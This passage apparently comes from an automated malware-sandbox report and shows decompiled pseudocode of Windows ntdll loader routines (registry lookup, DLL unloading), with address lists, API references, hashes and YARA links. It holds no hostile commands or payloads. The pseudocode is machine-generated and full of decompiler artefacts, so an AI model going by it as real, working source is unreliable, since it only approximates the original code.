										memcpy(_a20, _t128, _t117);
									}
									goto L51;
								}
								_t115 = _a24;
								if( *((intOrPtr*)(_t128 + (_t117 >> 1) * 2 - 2)) != 0) {
									_t117 = _t117 + 2;
									_v80 = _t117;
									if(_t115 < _t117) {
										_t134 = 0x80000005;
									} else {
										 *((short*)(_t128 + (_t117 >> 1) * 2 - 2)) = 0;
										_t117 = _v80;
									}
								}
								if(_t134 < 0 ||  *((intOrPtr*)(_t131 + 4)) != 2) {
									goto L47;
								} else {
									_t118 = _t128;
									_t61 = _t118 + 2; // 0xe
									_t137 = _t61;
									do {
										_t100 =  *_t118;
										_t118 = _t118 + 2;
									} while (_t100 != _v68);
									_t111 = 0;
									_t134 = E6B202440(0, _t128, _t118 - _t137 >> 1, _a20, _t115 >> 1,  &_v64);
									if(_t134 >= 0 || _t134 == 0xc0000023) {
										_t121 = _a28;
										if(_t121 != 0) {
											 *_t121 = _v64 + _v64;
										}
										if(_t134 == 0xc0000023) {
											_t134 = 0x80000005;
										}
									}
									goto L10;
								}
							}
							if( *((intOrPtr*)(_t131 + 4)) == 1 ||  *((intOrPtr*)(_t131 + 4)) == 2) {
								goto L32;
							} else {
								_t134 = 0xc0000024;
								goto L51;
							}
						}
						_t134 = 0xc0000017;
						goto L51;
					} else {
						_t134 = 0xc0000095;
						L51:
						_t111 = 0;
						goto L10;
					}
				}
				L2:
				_t127 = _a12;
				if(_t127 == 0) {
					goto L20;
				} else {
					_t123 = _t127;
					_t138 = _t123 + 2;
					goto L4;
					L4:
					_t106 =  *_t123;
					_t123 = _t123 + 2;
					if(_t106 != _t111) {
						goto L4;
					} else {
						_t107 = (_t123 - _t138 >> 1) + 1;
						_t126 = _t107 + _t107;
						_v64 = _t126;
						if(_t126 < _t107) {
							_t134 = 0xc0000095;
						} else {
							_t108 = _a28;
							asm("sbb esi, esi");
							_t134 = _t138 & 0x80000005;
							if(_t108 != 0) {
								 *_t108 = _t126;
							}
							if(_t126 <= _a24) {
								memcpy(_a20, _t127, _t126);
							}
						}
						goto L10;
					}
				}
			}











































                                                                                                                            0x6b1d6f6b
                                                                                                                            0x6b1d6f6f
                                                                                                                            0x6b1d6f71
                                                                                                                            0x6b1d6f75
                                                                                                                            0x6b1d6f79
                                                                                                                            0x6b1d6f7f
                                                                                                                            0x6b1d6f83
                                                                                                                            0x6b2320d3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2320d9
                                                                                                                            0x6b1d7045
                                                                                                                            0x6b1d704b
                                                                                                                            0x6b1d704b
                                                                                                                            0x6b1d6f89
                                                                                                                            0x6b1d6f90
                                                                                                                            0x6b1d6f98
                                                                                                                            0x6b1d6fa0
                                                                                                                            0x6b1d6fa1
                                                                                                                            0x6b1d6faa
                                                                                                                            0x6b1d6fae
                                                                                                                            0x6b1d6faf
                                                                                                                            0x6b1d6fb7
                                                                                                                            0x6b1d6fbb
                                                                                                                            0x6b1d6fc4
                                                                                                                            0x6b1d6fcc
                                                                                                                            0x6b2320e5
                                                                                                                            0x6b1d7025
                                                                                                                            0x6b1d702a
                                                                                                                            0x6b2322a1
                                                                                                                            0x6b2322a5
                                                                                                                            0x6b2322a5
                                                                                                                            0x6b1d7035
                                                                                                                            0x6b2322af
                                                                                                                            0x6b2322b3
                                                                                                                            0x6b2322b3
                                                                                                                            0x6b1d703d
                                                                                                                            0x6b2322c8
                                                                                                                            0x6b2322c8
                                                                                                                            0x6b1d7043
                                                                                                                            0x00000000
                                                                                                                            0x6b1d7043
                                                                                                                            0x6b2320f3
                                                                                                                            0x6b2320fc
                                                                                                                            0x6b232104
                                                                                                                            0x6b23210c
                                                                                                                            0x6b23210d
                                                                                                                            0x6b232116
                                                                                                                            0x6b23211e
                                                                                                                            0x6b23211f
                                                                                                                            0x6b232127
                                                                                                                            0x6b23212b
                                                                                                                            0x6b232134
                                                                                                                            0x6b23213c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b232142
                                                                                                                            0x6b232144
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23214a
                                                                                                                            0x6b23214f
                                                                                                                            0x6b232151
                                                                                                                            0x6b232151
                                                                                                                            0x6b23215c
                                                                                                                            0x6b232161
                                                                                                                            0x6b232164
                                                                                                                            0x6b232169
                                                                                                                            0x6b232187
                                                                                                                            0x6b23218b
                                                                                                                            0x6b23219b
                                                                                                                            0x6b23219c
                                                                                                                            0x6b23219d
                                                                                                                            0x6b23219e
                                                                                                                            0x6b2321a4
                                                                                                                            0x6b2321a5
                                                                                                                            0x6b2321ae
                                                                                                                            0x6b2321b2
                                                                                                                            0x6b2321d0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2321d6
                                                                                                                            0x6b2321d6
                                                                                                                            0x6b2321d9
                                                                                                                            0x6b2321d9
                                                                                                                            0x6b2321dc
                                                                                                                            0x6b2321e2
                                                                                                                            0x6b232280
                                                                                                                            0x6b232280
                                                                                                                            0x6b232285
                                                                                                                            0x6b232287
                                                                                                                            0x6b232287
                                                                                                                            0x6b23228b
                                                                                                                            0x6b232292
                                                                                                                            0x6b232297
                                                                                                                            0x00000000
                                                                                                                            0x6b23228b
                                                                                                                            0x6b2321f3
                                                                                                                            0x6b2321f6
                                                                                                                            0x6b2321f8
                                                                                                                            0x6b2321fb
                                                                                                                            0x6b232201
                                                                                                                            0x6b232212
                                                                                                                            0x6b232203
                                                                                                                            0x6b232207
                                                                                                                            0x6b23220c
                                                                                                                            0x6b23220c
                                                                                                                            0x6b232201
                                                                                                                            0x6b232219
                                                                                                                            0x00000000
                                                                                                                            0x6b232221
                                                                                                                            0x6b232221
                                                                                                                            0x6b232223
                                                                                                                            0x6b232223
                                                                                                                            0x6b232226
                                                                                                                            0x6b232226
                                                                                                                            0x6b232229
                                                                                                                            0x6b23222c
                                                                                                                            0x6b232240
                                                                                                                            0x6b23224c
                                                                                                                            0x6b232255
                                                                                                                            0x6b23225f
                                                                                                                            0x6b232264
                                                                                                                            0x6b23226c
                                                                                                                            0x6b23226c
                                                                                                                            0x6b232270
                                                                                                                            0x6b232276
                                                                                                                            0x6b232276
                                                                                                                            0x6b232270
                                                                                                                            0x00000000
                                                                                                                            0x6b232255
                                                                                                                            0x6b232219
                                                                                                                            0x6b2321b8
                                                                                                                            0x00000000
                                                                                                                            0x6b2321c0
                                                                                                                            0x6b2321c0
                                                                                                                            0x00000000
                                                                                                                            0x6b2321c0
                                                                                                                            0x6b2321b8
                                                                                                                            0x6b23218d
                                                                                                                            0x00000000
                                                                                                                            0x6b23216b
                                                                                                                            0x6b23216b
                                                                                                                            0x6b23229a
                                                                                                                            0x6b23229a
                                                                                                                            0x00000000
                                                                                                                            0x6b23229a
                                                                                                                            0x6b232169
                                                                                                                            0x6b1d6fd2
                                                                                                                            0x6b1d6fd2
                                                                                                                            0x6b1d6fd7
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6fdd
                                                                                                                            0x6b1d6fdd
                                                                                                                            0x6b1d6fdf
                                                                                                                            0x6b1d6fdf
                                                                                                                            0x6b1d6fe2
                                                                                                                            0x6b1d6fe2
                                                                                                                            0x6b1d6fe5
                                                                                                                            0x6b1d6feb
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6fed
                                                                                                                            0x6b1d6ff1
                                                                                                                            0x6b1d6ff4
                                                                                                                            0x6b1d6ff7
                                                                                                                            0x6b1d6ffd
                                                                                                                            0x6b1d704e
                                                                                                                            0x6b1d6fff
                                                                                                                            0x6b1d7002
                                                                                                                            0x6b1d7005
                                                                                                                            0x6b1d7007
                                                                                                                            0x6b1d700f
                                                                                                                            0x6b1d7011
                                                                                                                            0x6b1d7011
                                                                                                                            0x6b1d7016
                                                                                                                            0x6b1d701d
                                                                                                                            0x6b1d7022
                                                                                                                            0x6b1d7016
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6ffd
                                                                                                                            0x6b1d6feb

                                                                                                                            APIs
                                                                                                                            • ZwOpenKey.1105(?,?,?,?,00020019,00000018), ref: 6B1D6FBF
                                                                                                                              • Part of subcall function 6B219600: LdrInitializeThunk.NTDLL(6B211119,?,?,00000018,?), ref: 6B21960A
                                                                                                                            • memcpy.1105(?,?,?,?,00020019,00000018,?,?,?,?,?,?,00020019,00000018), ref: 6B1D701D
                                                                                                                            • RtlInitUnicodeString.1105(?,?,?,?,?,?,00020019,00000018), ref: 6B2320F3
                                                                                                                            • ZwOpenKey.1105(?,00020019,00000018,?,?,?,?,?,?,00020019,00000018), ref: 6B23212F
                                                                                                                            • RtlInitUnicodeString.1105(?,?,?,00020019,00000018,?,?,?,?,?,?,00020019,00000018), ref: 6B23215C
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?,?,?,?,00020019,00000018,?,?,?,?,?,?,00020019,00000018), ref: 6B232182
                                                                                                                            • ZwClose.1105(00000000,?,?,?,?,00020019,00000018), ref: 6B2322A5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitOpenStringUnicode$AllocateCloseHeapInitializeThunkmemcpy
                                                                                                                            • String ID: @$TargetPath
                                                                                                                            • API String ID: 1135747570-4164548946
                                                                                                                            • Opcode ID: 9d737e173fdcd694716ef43287445f6cb13848580d3fcd992201726fe224a906
                                                                                                                            • Instruction ID: 0704ba5c6f5cfa0188689f663856ce372b3e0b71588fca09cd8e3fed84ea2dae
                                                                                                                            • Opcode Fuzzy Hash: 9d737e173fdcd694716ef43287445f6cb13848580d3fcd992201726fe224a906
                                                                                                                            • Instruction Fuzzy Hash: F681BEB290872AAFD710CF28C8C1A5BB7F8BB85718F01496EE95497250E339DC45CBD2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DF51D, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185librarymemorytimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E6B1DF51D(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				void* _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t54;
				intOrPtr _t63;
				intOrPtr _t76;
				signed int _t77;
				signed int _t86;
				void* _t88;
				signed int _t89;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t95;
				signed int _t101;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;
				void* _t110;
				intOrPtr* _t111;
				void* _t112;
				void* _t113;
				intOrPtr* _t115;
				void* _t116;
				signed int _t117;
				signed int _t118;
				signed int _t120;

				_t106 = __edx;
				_t93 = __ecx;
				_t120 = (_t118 & 0xfffffff8) - 0x14;
				_v8 =  *0x6b2cd360 ^ _t120;
				_t115 = __ecx;
				_v24 =  *[fs:0x30];
				_t88 = 0;
				_v16 = __ecx;
				_push(_t108);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L3:
					 *(_t115 + 0x20) =  *(_t115 + 0x20) | 0xffffffff;
					E6B1E0225(_t88, _t93, _t108, _t115,  *(_t115 + 0x20));
					L4:
					if( *0x6b2c8472 != _t88) {
						_t106 =  *0x7ffe0330;
						_t89 =  *0x6b2cb210; // 0x0
						_t94 = 0x20;
						_t93 = _t94 - (_t106 & 0x0000001f);
						asm("ror ebx, cl");
						_t88 = _t89 ^ _t106;
					}
					L6B1EEEF0(0x6b2c52d8);
					_t54 =  *_t115;
					while(1) {
						_v20 = _t54;
						if(_t54 == _t115) {
							break;
						}
						_t22 = _t54 - 0x54; // -84
						_t109 = _t22;
						__eflags =  *(_t109 + 0x34) & 0x00000008;
						if(( *(_t109 + 0x34) & 0x00000008) != 0) {
							_push(_t93);
							_t106 = 2;
							E6B1E8B80(_t109, _t106);
							__eflags = _t88;
							if(_t88 != 0) {
								 *0x6b2cb1e0(_t109);
								 *_t88();
							}
							_t93 = _t109;
							E6B1E8800(_t93, 1);
							_t63 = _v32;
							__eflags =  *(_t63 + 0x68) & 0x00000100;
							if(( *(_t63 + 0x68) & 0x00000100) != 0) {
								_t93 = _t109;
								E6B25EA20(_t93);
							}
						}
						__eflags =  *0x6b2c5780 & 0x00000005;
						if(__eflags != 0) {
							_t46 = _t109 + 0x24; // -48
							E6B255510("minkernel\\ntdll\\ldrsnap.c", 0xc5e, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t46);
							_t120 = _t120 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t109 + 0x18)));
						E6B1E0100(_t88, _t93, _t109, _t115, __eflags);
						_t54 =  *_v28;
					}
					_t65 = E6B1EEB70(_t93, 0x6b2c52d8);
					while(1) {
						L8:
						_t95 =  *(_t115 + 0x18);
						if(_t95 == 0) {
							break;
						}
						_t110 =  *_t95;
						__eflags = _t110 - _t95;
						if(_t110 != _t95) {
							_t65 =  *_t110;
							 *_t95 =  *_t110;
						} else {
							_t34 = _t115 + 0x18;
							 *_t34 =  *(_t115 + 0x18) & 0x00000000;
							__eflags =  *_t34;
						}
						__eflags = _t110;
						if(_t110 == 0) {
							break;
						} else {
							E6B1F2280(_t65, 0x6b2c84d8);
							_t92 =  *((intOrPtr*)(_t110 + 4));
							_t37 = _t110 + 8; // -76
							_t107 = _t37;
							_t101 =  *(_t92 + 0x1c);
							_t76 =  *_t101;
							_v28 = _t76;
							__eflags = _t76 - _t107;
							if(_t76 != _t107) {
								_t117 = _v24;
								do {
									_t77 =  *_t117;
									_t101 = _t117;
									_t117 = _t77;
									__eflags = _t77 - _t107;
								} while (_t77 != _t107);
								_t115 = _v16;
							}
							 *_t101 =  *_t107;
							__eflags =  *(_t92 + 0x1c) - _t107;
							if(__eflags == 0) {
								asm("sbb eax, eax");
								_t86 =  ~(_t101 - _t107) & _t101;
								__eflags = _t86;
								 *(_t92 + 0x1c) = _t86;
							}
							_t106 = 0;
							_push( &_v12);
							E6B1E093F(_t92, _t92, 0, _t110, _t115, __eflags);
							E6B1EFFB0(_t92, _t110, 0x6b2c84d8);
							__eflags = _v20;
							if(_v20 != 0) {
								E6B1DF51D(_t92, 0);
							}
							_t65 = RtlFreeHeap( *0x6b2c7b98, 0, _t110);
							continue;
						}
					}
					_t111 =  *_t115;
					 *(_t115 + 0x20) = 0xfffffffe;
					if(_t111 == _t115) {
						L14:
						_pop(_t112);
						_pop(_t116);
						_pop(_t90);
						return E6B21B640(_t65, _t90, _v8 ^ _t120, _t106, _t112, _t116);
					} else {
						goto L10;
					}
					do {
						L10:
						_t91 =  *_t111;
						_t113 = _t111 + 0xffffffac;
						 *(_t113 + 0x34) =  *(_t113 + 0x34) | 0x00000002;
						E6B1F2280(_t65, 0x6b2c84d8);
						E6B1E008A(_t113, _t115);
						if(( *(_t113 + 0x34) & 0x00000080) != 0) {
							_t17 = _t113 + 0x74; // -140
							L6B1DF900(0x6b2c85fc, _t17);
							_t18 = _t113 + 0x68; // -152
							L6B1DF900(0x6b2c85f4, _t18);
							 *(_t113 + 0x20) =  *(_t113 + 0x20) & 0x00000000;
						}
						E6B1EFFB0(_t91, _t113, 0x6b2c84d8);
						if( *0x6b2c7b94 != 0) {
							E6B210413(_t113);
						}
						_t65 = E6B1EEC7F(_t113);
						_t111 = _t91;
					} while (_t91 != _t115);
					goto L14;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L4;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) != 9) {
					goto L8;
				}
				goto L3;
			}









































                                                                                                                            0x6b1df51d
                                                                                                                            0x6b1df51d
                                                                                                                            0x6b1df525
                                                                                                                            0x6b1df52f
                                                                                                                            0x6b1df53b
                                                                                                                            0x6b1df53d
                                                                                                                            0x6b1df541
                                                                                                                            0x6b1df543
                                                                                                                            0x6b1df547
                                                                                                                            0x6b1df54c
                                                                                                                            0x6b1df55a
                                                                                                                            0x6b1df55a
                                                                                                                            0x6b1df55e
                                                                                                                            0x6b1df563
                                                                                                                            0x6b1df569
                                                                                                                            0x6b1df718
                                                                                                                            0x6b1df720
                                                                                                                            0x6b1df72b
                                                                                                                            0x6b1df72c
                                                                                                                            0x6b1df72e
                                                                                                                            0x6b1df730
                                                                                                                            0x6b1df730
                                                                                                                            0x6b1df574
                                                                                                                            0x6b1df579
                                                                                                                            0x6b1df57b
                                                                                                                            0x6b1df57b
                                                                                                                            0x6b1df581
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1df61f
                                                                                                                            0x6b1df61f
                                                                                                                            0x6b1df622
                                                                                                                            0x6b1df626
                                                                                                                            0x6b1df628
                                                                                                                            0x6b1df62b
                                                                                                                            0x6b1df62e
                                                                                                                            0x6b1df633
                                                                                                                            0x6b1df635
                                                                                                                            0x6b1df73a
                                                                                                                            0x6b1df740
                                                                                                                            0x6b1df740
                                                                                                                            0x6b1df63d
                                                                                                                            0x6b1df63f
                                                                                                                            0x6b1df644
                                                                                                                            0x6b1df648
                                                                                                                            0x6b1df64f
                                                                                                                            0x6b235d11
                                                                                                                            0x6b235d13
                                                                                                                            0x6b235d13
                                                                                                                            0x6b1df64f
                                                                                                                            0x6b1df655
                                                                                                                            0x6b1df65c
                                                                                                                            0x6b235d1d
                                                                                                                            0x6b235d37
                                                                                                                            0x6b235d3c
                                                                                                                            0x6b235d3c
                                                                                                                            0x6b1df662
                                                                                                                            0x6b1df664
                                                                                                                            0x6b1df667
                                                                                                                            0x6b1df670
                                                                                                                            0x6b1df670
                                                                                                                            0x6b1df58c
                                                                                                                            0x6b1df591
                                                                                                                            0x6b1df591
                                                                                                                            0x6b1df591
                                                                                                                            0x6b1df596
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1df677
                                                                                                                            0x6b1df679
                                                                                                                            0x6b1df67b
                                                                                                                            0x6b1df706
                                                                                                                            0x6b1df708
                                                                                                                            0x6b1df681
                                                                                                                            0x6b1df681
                                                                                                                            0x6b1df681
                                                                                                                            0x6b1df681
                                                                                                                            0x6b1df681
                                                                                                                            0x6b1df685
                                                                                                                            0x6b1df687
                                                                                                                            0x00000000
                                                                                                                            0x6b1df68d
                                                                                                                            0x6b1df692
                                                                                                                            0x6b1df697
                                                                                                                            0x6b1df69a
                                                                                                                            0x6b1df69a
                                                                                                                            0x6b1df69d
                                                                                                                            0x6b1df6a0
                                                                                                                            0x6b1df6a2
                                                                                                                            0x6b1df6a6
                                                                                                                            0x6b1df6a8
                                                                                                                            0x6b1df6f2
                                                                                                                            0x6b1df6f6
                                                                                                                            0x6b1df6f6
                                                                                                                            0x6b1df6f8
                                                                                                                            0x6b1df6fa
                                                                                                                            0x6b1df6fc
                                                                                                                            0x6b1df6fc
                                                                                                                            0x6b1df700
                                                                                                                            0x6b1df700
                                                                                                                            0x6b1df6ac
                                                                                                                            0x6b1df6ae
                                                                                                                            0x6b1df6b1
                                                                                                                            0x6b1df6b9
                                                                                                                            0x6b1df6bb
                                                                                                                            0x6b1df6bb
                                                                                                                            0x6b1df6bd
                                                                                                                            0x6b1df6bd
                                                                                                                            0x6b1df6c4
                                                                                                                            0x6b1df6c6
                                                                                                                            0x6b1df6c9
                                                                                                                            0x6b1df6d3
                                                                                                                            0x6b1df6d8
                                                                                                                            0x6b1df6dd
                                                                                                                            0x6b1df711
                                                                                                                            0x6b1df711
                                                                                                                            0x6b1df6e8
                                                                                                                            0x00000000
                                                                                                                            0x6b1df6e8
                                                                                                                            0x6b1df687
                                                                                                                            0x6b1df59c
                                                                                                                            0x6b1df59e
                                                                                                                            0x6b1df5a7
                                                                                                                            0x6b1df60d
                                                                                                                            0x6b1df611
                                                                                                                            0x6b1df612
                                                                                                                            0x6b1df613
                                                                                                                            0x6b1df61e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1df5a9
                                                                                                                            0x6b1df5a9
                                                                                                                            0x6b1df5a9
                                                                                                                            0x6b1df5ab
                                                                                                                            0x6b1df5b3
                                                                                                                            0x6b1df5b7
                                                                                                                            0x6b1df5be
                                                                                                                            0x6b1df5c7
                                                                                                                            0x6b1df5c9
                                                                                                                            0x6b1df5d2
                                                                                                                            0x6b1df5d7
                                                                                                                            0x6b1df5e0
                                                                                                                            0x6b1df5e5
                                                                                                                            0x6b1df5e5
                                                                                                                            0x6b1df5ee
                                                                                                                            0x6b1df5fa
                                                                                                                            0x6b235d46
                                                                                                                            0x6b235d46
                                                                                                                            0x6b1df602
                                                                                                                            0x6b1df607
                                                                                                                            0x6b1df609
                                                                                                                            0x00000000
                                                                                                                            0x6b1df5a9
                                                                                                                            0x6b1df552
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1df558
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C52D8), ref: 6B1DF574
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C52D8,?,00000000,6B2C52D8), ref: 6B1DF58C
                                                                                                                            • RtlAcquireSRWLockExclusive.1105 ref: 6B1DF5B7
                                                                                                                            • RtlRbRemoveNode.1105(6B2C85FC,-0000008C), ref: 6B1DF5D2
                                                                                                                            • RtlRbRemoveNode.1105(6B2C85F4,-00000098,6B2C85FC,-0000008C), ref: 6B1DF5E0
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C84D8), ref: 6B1DF5EE
                                                                                                                            • LdrUnloadAlternateResourceModuleEx.1105(?,00000000,6B2C52D8), ref: 6B1DF667
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C84D8,6B2C52D8,?,00000000,6B2C52D8), ref: 6B1DF692
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C84D8,?,6B2C84D8,6B2C52D8,?,00000000,6B2C52D8), ref: 6B1DF6D3
                                                                                                                            • RtlFreeHeap.1105(00000000,-00000054,6B2C84D8,?,6B2C84D8,6B2C52D8), ref: 6B1DF6E8
                                                                                                                            • RtlDebugPrintTimes.1105(-00000054,?,6B2C52D8), ref: 6B1DF73A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCriticalNodeReleaseRemoveSection$AlternateDebugEnterFreeHeapLeaveModulePrintResourceTimesUnload
                                                                                                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                            • API String ID: 2596885168-2283098728
                                                                                                                            • Opcode ID: 64efbd24a99c1d0730b0c241c8b31292bfa486047367581b86a288dcaa2347ae
                                                                                                                            • Instruction ID: d7d1707e8580ffd45a0115bfc48ad9c43d740f5e20fafb5babbc3bc9ec391b0b
                                                                                                                            • Opcode Fuzzy Hash: 64efbd24a99c1d0730b0c241c8b31292bfa486047367581b86a288dcaa2347ae
                                                                                                                            • Instruction Fuzzy Hash: 28512771604705BFC714DF38C8C9B2A73E1BB95318F10465DE4658B690EB3CEA41CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D52A5, Relevance: 24.2, APIs: 16, Instructions: 161nativememoryfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E6B1D52A5(char __ecx) {
				char _v20;
				void* _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v60;
				void* __ebx;
				void* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				void* _t102;
				void* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					L6B1EEEF0(0x6b2c79a0);
					_t104 =  *0x6b2c8210;
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E6B1EEB70(_t93, 0x6b2c79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E6B219890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									L6B1EEEF0(0x6b2c79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E6B1EEB70(0, 0x6b2c79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t93 = _t104 + 0xc;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E6B20F0BF(_t104 + 0xc,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									L6B1EEEF0(0x6b2c79a0);
									__eflags =  *0x6b2c8210 - _t104;
									if( *0x6b2c8210 == _t104) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x6b2c8210 = _t102;
										 *_t95 =  *((intOrPtr*)(_t102 + 0xc));
										 *((intOrPtr*)(_t95 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
										 *((intOrPtr*)(_t95 + 8)) =  *((intOrPtr*)(_t102 + 4));
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E6B254888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E6B1EEB70(_t95, 0x6b2c79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E6B2195D0();
											RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t104);
											_t102 = _v40;
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E6B2195D0();
											RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t104);
											_t102 = _v40;
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E6B1EEB70(_t93, 0x6b2c79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E6B2195D0();
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t104);
										_t102 = _v40;
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t102 + 4)));
										E6B2195D0();
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E6B20F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                                            0x6b1d52a5
                                                                                                                            0x6b1d52ad
                                                                                                                            0x6b1d52b0
                                                                                                                            0x6b1d52b3
                                                                                                                            0x6b1d52b7
                                                                                                                            0x6b1d52ba
                                                                                                                            0x6b1d52bf
                                                                                                                            0x6b1d52c4
                                                                                                                            0x6b1d52cc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d52ce
